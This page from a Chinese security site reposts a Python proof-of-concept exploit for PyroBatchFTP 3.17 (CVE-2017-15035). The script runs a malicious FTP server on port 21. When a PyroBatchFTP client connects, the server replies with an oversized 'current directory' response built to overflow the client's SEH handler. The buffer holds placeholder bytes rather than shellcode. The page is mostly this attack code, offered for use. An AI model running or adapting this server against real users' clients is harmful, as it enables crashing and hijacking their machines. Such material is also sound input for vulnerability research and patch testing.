首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PyroBatchFTP 3.17 - Buffer Overflow (SEH)
来源:https://www.7elements.co.uk 作者:McGuigan 发布时间:2017-10-10  
#!/usr/bin/python
  
print "PyroBatchFTP Local Buffer Overflow (SEH) Server"
 
#Author: Kevin McGuigan @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.emtech.com
#Date: 07/10/2017
#Version: 3.17
#Tested on: Windows 7 32-bit
#CVE: CVE-2017-15035
 
 
import socket
import sys
 
buffer="A" * 2292 +   "B" * 4 + "C" * 4 + "D" * 800
port = 21
 
try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", port))
        s.listen(5)
        print("[+] FTP server started on port: "+str(port)+"\r\n")
except:
        print("[+] Failed to bind the server to port: "+str(port)+"\r\n")
 
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Rancher Server - Docker Daemon
·WebKit JSC - 'BytecodeGenerato
·ClipBucket 2.8.3 - Remote Code
·DiskBoss Enterprise 8.4.16 - L
·Dnsmasq < 2.78 - Integer Under
·Dnsmasq < 2.78 - Lack of free(
·Dnsmasq < 2.78 - Information L
·Dnsmasq < 2.78 - Stack-Based O
·Dnsmasq < 2.78 - Heap-Based Ov
·Dnsmasq < 2.78 - 2-byte Heap-B
·Qmail SMTP - Bash Environment
·Linux Kernel < 4.14.rc3 - Loca
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved